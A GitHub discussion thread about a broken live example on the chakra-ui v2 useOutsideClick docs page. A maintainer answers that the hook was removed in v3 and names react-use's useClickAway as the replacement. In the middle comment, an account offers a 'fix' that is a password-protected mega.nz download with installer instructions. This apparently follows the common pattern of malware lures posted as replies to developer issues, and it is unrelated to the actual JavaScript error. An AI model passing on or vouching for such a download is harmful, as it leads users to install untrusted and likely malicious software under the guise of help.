### DISCUSSION TITLE
Error in the docs for useOutsideClick hook

### DISCUSSION THREAD

**Discussion by ArturoGrullon** [chakra-ui/chakra-ui#8806] [General] [answered]
### Description

When I access the docs page for [useOutsideClick](https://v2.chakra-ui.com/docs/hooks/use-outside-click#usage), I expect a functional example, but is not working and see the error "ReferenceError: useOutsideClick is not defined".

### Link to Reproduction

https://v2.chakra-ui.com/docs/hooks/use-outside-click#usage

### Steps to reproduce

1. Go to https://v2.chakra-ui.com/docs/hooks/use-outside-click#usage
2. Scroll down the editable example
3. See the error at the bottom of the editable example

### Chakra UI Version

2.8.2

### Browser

Google Chrome 

### Operating System

- [X] macOS
- [ ] Windows
- [ ] Linux

### Additional Information

<img width="1453" alt="Screenshot 2024-08-29 at 6 52 02 PM" src="https://github.com/user-attachments/assets/691998db-530d-428f-8a24-377816af13e2">

**Comment by Musharrafjamal** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://mega.nz/folder/905izDCI#tZAd-Ja0A5L7aBS2VunHtg
password: changeme
when you installing it, you need to place a check in install to path and select "USX"

**Comment by segunadebayo** [comment, marked as answer]
`useOutsideClick` is gone in v3. Use `useClickAway` from `react-use`. We are not shipping new v2 work.
